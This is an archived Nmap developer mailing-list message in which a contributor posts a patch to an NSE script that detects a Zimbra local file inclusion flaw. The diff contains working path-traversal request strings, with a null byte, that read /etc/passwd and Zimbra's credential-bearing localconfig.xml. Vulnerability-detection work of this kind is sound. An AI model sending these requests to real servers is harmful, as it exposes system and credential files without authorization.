Nmap Development mailing list archives
Re: [NSE] Created NSE script to detect Zimbra 0 day
From: Daniel Miller <bonsaiviking () gmail com>
Date: Fri, 07 Feb 2014 09:36:36 -0600
On 02/07/2014 03:10 AM, Paul AMAR wrote:
Hi, Got quite busy and I forgot about the task. Here is the patch : Index: http-vuln-zimbra-lfi.nse =================================================================== --- http-vuln-zimbra-lfi.nse (revision 32704) +++ http-vuln-zimbra-lfi.nse (working copy) @@ -87,8 +87,8 @@ local file_long = "../../../../../../../../../etc/passwd" --local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml" - local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00" - local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00" + local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00" + local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00" stdnse.print_debug(1, "Trying to detect if the server is vulnerable") stdnse.print_debug(1, "GET " .. uri .. escape(url_short)) Cheers and thanks to Chris to remind me.
Paul, Thanks for this. Fixed in r32705. Dan _______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: [NSE] Created NSE script to detect Zimbra 0 day Paul AMAR (Jan 09)
- Re: [NSE] Created NSE script to detect Zimbra 0 day Paul AMAR (Feb 07)
- Re: [NSE] Created NSE script to detect Zimbra 0 day Daniel Miller (Feb 07)
- Re: [NSE] Created NSE script to detect Zimbra 0 day Paul AMAR (Feb 07)